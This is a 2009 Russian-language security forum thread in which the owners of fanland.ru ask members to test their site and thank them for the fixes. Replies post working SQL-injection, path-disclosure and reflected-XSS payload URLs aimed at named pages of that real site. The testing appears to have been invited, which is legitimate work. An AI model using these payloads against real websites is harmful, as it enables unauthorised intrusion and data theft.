ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Проверка на уязвимости
Перезагрузить страницу Fanland.ru
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

fanland.ru
  #1  
Старый 18.01.2009, 17:06
Аватар для ВолкS
ВолкS
Новичок
Регистрация: 15.06.2008
Сообщений: 12
Провел на форуме:
76311

Репутация: 0
Отправить сообщение для ВолкS с помощью ICQ
По умолчанию fanland.ru
Проверьте, пожалуйста, на уязвимости различные http://fanland.ru
 
Ответить с цитированием

  #2  
Старый 18.01.2009, 18:25
Аватар для BlackSun
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию
Раскрытие путей
http://fanland.ru/news.php?usr='&pwd='%20--%20
http://fanland.ru/forum.php?usr=user&pwd=pwd&razd=3&tema=-1'&id=look_t
http://fanland.ru/forum.php?usr=user&pwd=pwd&razd=-1'&user=BlackKogep&tema=46&id=create_p
http://fanland.ru/?usr=valid user&pwd=valid pass (bzz, wtf 0_o)
В поиске тоже самое

SQL-INJ
http://fanland.ru/news.php?usr='+or+1%3d'1&pwd='%20--%20

XSS
http://fanland.ru/news.php?usr='+or+1%3d'1'%20--%20'>"><script>alert()</script><noscript>&pwd='%20--%20

sql-inj в действии
http://fanland.ru/msg.php?usr=West'%20--%20&pwd=b46641af0203c864a8f5c44f2ab9c250&id=read

------------------------
Дальше копать не буду, там этого добра еще навалом. На доработку, потом заходите снова
Последний раз редактировалось BlackSun; 18.01.2009 в 18:50..
 
Ответить с цитированием

  #3  
Старый 19.01.2009, 13:04
Аватар для kolpeex
kolpeex
Новичок
Регистрация: 17.02.2008
Сообщений: 28
Провел на форуме:
68228

Репутация: 39
По умолчанию
снова раскрытие путей
http://fanland.ru/info_m.php?usr[]=LegionDEAD&pwd=[скрыто]&man=LegionDEAD
Цитата:
Warning: mysql_real_escape_string() expects parameter 1 to be string, array given in /[path]/fanland.ru/info_m.php on line 15
http://fanland.ru/forum.php?usr=kolpeex&pwd=[скрыто]&razd=[здесь]&user=DAMBOLDOR&tema=[и здесь]&id=create_p

С темой WEB и кавычкой в пароле сайт уходит в бесконечную рекурсию, загрязняя мой кэш.
Последний раз редактировалось BlackSun; 08.02.2009 в 14:44..
 
Ответить с цитированием

  #4  
Старый 19.01.2009, 13:19
Аватар для ВолкS
ВолкS
Новичок
Регистрация: 15.06.2008
Сообщений: 12
Провел на форуме:
76311

Репутация: 0
Отправить сообщение для ВолкS с помощью ICQ
По умолчанию
Спасибо всем отписавшимся. Ща на другой сервер будем переезжать, заодно на день-два закроем на устранение уязвимостей. Еще раз спасибо!
 
Ответить с цитированием

  #5  
Старый 19.01.2009, 16:44
Аватар для ronald
ronald
Участник форума
Регистрация: 27.03.2008
Сообщений: 288
Провел на форуме:
800727

Репутация: 83
Отправить сообщение для ronald с помощью ICQ
По умолчанию
может и бесполезно, но вот: http://fanland.ru/info_1.php на момент отписывания поста выскакивает ошибка при переходе туды
 
Ответить с цитированием

Fanland.ru
  #6  
Старый 08.02.2009, 14:06
Аватар для LiraS
LiraS
Новичок
Регистрация: 04.07.2008
Сообщений: 3
Провел на форуме:
28597

Репутация: 0
По умолчанию Fanland.ru
В прошлый раз создавал сдесь тему мой хороший друг, тогда много ошибок нашли попросили доработать, я конечно вроде все вами сказанные ошибки исправил, но все же просьба еще раз проверить скрипт, так как я мог допустить также много ошибок, так как сам я самоучка, нигде не учился...Кстате вот адресок: http://fanland.ru
 
Ответить с цитированием

  #7  
Старый 08.02.2009, 21:15
Аватар для Maestus
Maestus
Новичок
Регистрация: 19.01.2009
Сообщений: 12
Провел на форуме:
236651

Репутация: 92
По умолчанию
Пассивный XSS
http://fanland.ru/info_m.php?usr=[any username]&pwd=[any password]&man=617"><script>alert(33)</script>
http://fanland.ru/anketa.php?usr=[any username]&pwd=[any pass]&man=618"><script>alert(23)</script>
Последний раз редактировалось Maestus; 08.02.2009 в 22:34..
 
Ответить с цитированием

  #8  
Старый 08.02.2009, 23:18
Аватар для LiraS
LiraS
Новичок
Регистрация: 04.07.2008
Сообщений: 3
Провел на форуме:
28597

Репутация: 0
По умолчанию
Спасибо, исправил ошибки, если есть еще, то пишите буду благодарен
 
Ответить с цитированием

  #9  
Старый 09.02.2009, 00:46
Аватар для Maestus
Maestus
Новичок
Регистрация: 19.01.2009
Сообщений: 12
Провел на форуме:
236651

Репутация: 92
По умолчанию
SQL инъекция
1./chat.php
1.1 http://fanland.ru/chat.php?pwd=password&usr=username'
1.2 http://fanland.ru/chat.php?usr=username&pwd=password'
2./smile.php
2.1 http://fanland.ru/smile.php?pwd=password&id=&usr=username'+and+'a'=' a
2.2 http://fanland.ru/smile.php?usr=username&id=&pwd=password'
Последний раз редактировалось Maestus; 09.02.2009 в 04:08..
 
Ответить с цитированием

  #10  
Старый 09.02.2009, 21:08
Аватар для LiraS
LiraS
Новичок
Регистрация: 04.07.2008
Сообщений: 3
Провел на форуме:
28597

Репутация: 0
По умолчанию
Спасибо, исправил, если найдете еще, то буду благодарен.
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ